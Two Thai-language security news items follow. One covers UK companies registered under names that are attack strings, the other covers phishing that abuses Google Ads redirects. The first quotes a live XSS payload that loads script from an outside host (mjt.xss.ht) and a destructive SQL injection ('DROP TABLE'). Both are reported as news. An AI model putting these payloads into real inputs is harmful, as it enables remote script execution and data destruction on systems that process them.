เมื่อวันที่ 15 ตุลาคม 2563 ในสหราชอาณาจักรมีผู้จดทะเบียนบริษัทโดยใช้ชื่อว่า "><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT> LTD (อ้างอิง https://www.companysearchesmadesimple.com/company/uk/12956509/script-src-https-mjt-xss-ht-script-ltd/) ซึ่งข้อความดังกล่าวเป็นแท็ก HTML ที่มีโค้ดเรียกสคริปต์จากเว็บไซต์ภายนอกมาแสดงผล เป็นเทคนิคการโจมตีในลักษณะ Cross-Site Scripting (XSS) อย่างไรก็ตาม ชื่อบริษัทดังกล่าวถูกเปลี่ยนเป็น THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD ในหน้าค้นหารายชื่อบริษัทของเว็บไซต์รัฐบาล (อ้างอิง https://find-and-update.company-information.service.gov.uk/company/12956509)

เหตุการณ์นี้ไม่ใช่ครั้งแรกที่มีผู้จดทะเบียนชื่อบริษัทโดยใช้อักขระพิเศษ เมื่อเดือนธันวาคม 2559 เคยมีผู้จดทะเบียนบริษัทโดยใช้ชื่อว่า ; DROP TABLE "COMPANIES";-- LTD (ข่าวเก่า https://www.thaicert.or.th/newsbite/2017-01-05-01.html) ซึ่งข้อความดังกล่าวเป็นคำสั่งโจมตีแบบ SQL injection เพื่อลบฐานข้อมูล

สาเหตุที่บริษัทดังกล่าวสามารถจดทะเบียนด้วยชื่อในลักษณะนี้ได้เนื่องจากกฎหมายของสหราชอาณาจักรอนุญาตให้มีการใช้อักขระพิเศษ เช่น ' < > / ? ในชื่อของบริษัทได้ (อ้างอิง https://www.legislation.gov.uk/uksi/2015/17/schedule/1/made) แต่อักขระพิเศษบางอย่างนั้นมีผลกระทบกับการแสดงผลของเว็บไซต์หรือการทำงานของระบบฐานข้อมูล เนื่องจากเป็นอักขระที่เกี่ยวข้องกับการเขียนสคริปต์หรือคำสั่ง ทำให้หากมีเว็บไซต์หรือแอปพลิเคชันใด ๆ ที่นำชื่อบริษัทเหล่านี้ไปจัดเก็บหรือประมวลผลโดยไม่มีกระบวนการจัดการกับอักขระพิเศษ (sanitize) ที่เหมาะสม ก็อาจส่งผลกระทบต่อการทำงานของระบบได้

วันที่: 2020-10-29 | ที่มา: Hacker News, Reddit | Share on Facebook Share on Twitter Share on Google+
แจ้งเตือน พบการส่งอีเมลฟิชชิ่งโดยใช้ลิงก์ไปยัง Google Ads โปรดตรวจสอบก่อนคลิก

ทีมวิจัยจาก PhishLabs ได้รายงานเทคนิคการโจมตีแบบฟิชชิ่งโดยอาศัยฟีเจอร์ redirect ของ Google Ads จุดประสงค์เพื่อหลบเลี่ยงระบบคัดกรองอีเมลสแปม โดยทางทีม PhishLabs พบว่าโครงสร้าง URL ของบริการ Google Ads นั้นเป็นในลักษณะ

hxxps://www[.]googleadservices[.]com/pagead/aclk?sa=[parameters]&adurl=[URL]

ซึ่งพารามิเตอร์ adurl ที่อยู่ท้ายสุดนั้นสามารถใส่ URL เพื่อพาไปยังเว็บไซต์อื่นได้ ผู้ประสงค์ร้ายจึงสามารถใช้ช่องทางนี้ในการส่งอีเมลเพื่อหลอกให้เหยื่อหลงเชื่อคลิกลิงก์ไปยังเว็บไซต์ฟิชชิ่งได้ (ตัวอย่าง URL แบบเต็มสามารถดูได้จากที่มา)

ทาง PhishLabs ระบุว่าการโจมตีแบบฟิชชิ่งที่อาศัยฟีเจอร์ redirect ของเว็บไซต์ที่มีความน่าเชื่อถือนั้นได้รับความนิยมในกลุ่มผู้ประสงค์ร้าย เนื่องจากไม่ต้องตั้งระบบ redirect เอง และระบบคัดกรองอีเมลสแปมส่วนใหญ่จะปล่อยผ่านอีเมลที่มีลิงก์ไปยังเว็บไซต์เหล่านี้เพราะถือว่าเป็นเว็บไซต์ที่น่าเชื่อถือ

ทั้งนี้ ทาง PhishLabs ระบุว่าพบการโจมตีในลักษณะนี้มาก่อนหน้านี้แล้ว โดยนอกจาก Google Ads แล้วก็ยังมีอีกหลายเว็บไซต์ที่สามารถใช้เพื่อโจมตีในลักษณะ redirect ได้อีกเช่นกัน

เนื่องจากรูปแบบการโจมตีในลักษณะนี้สามารถเล็ดรอดผ่านระบบคัดกรองอีเมลสแปมได้ รวมถึงการตรวจสอบความน่าเชื่อถือของเว็บไซต์ด้วยการพิจารณาจากโดเมนในลิงก์ที่แนบมากับอีเมลนั้นอาจจะไม่เพียงพอ เพื่อลดความเสี่ยง ผู้ใช้ควรพิจารณาความน่าเชื่อถือของอีเมล โดยหากพบลิงก์ที่ไม่ได้พาไปยังเว็บไซต์จริงของผู้ให้บริการ หรือพบการ redirect ไปยัง URL ปลายทางที่น่าสงสัย ควรพิจารณาความถูกต้องของเว็บไซต์ดังกล่าวก่อนกรอกข้อมูลเพื่อล็อกอินหรือทำธุรกรรม

วันที่: 2020-10-28 | ที่มา: PhishLabs | Share on Facebook Share on Twitter Share on Google+
Clear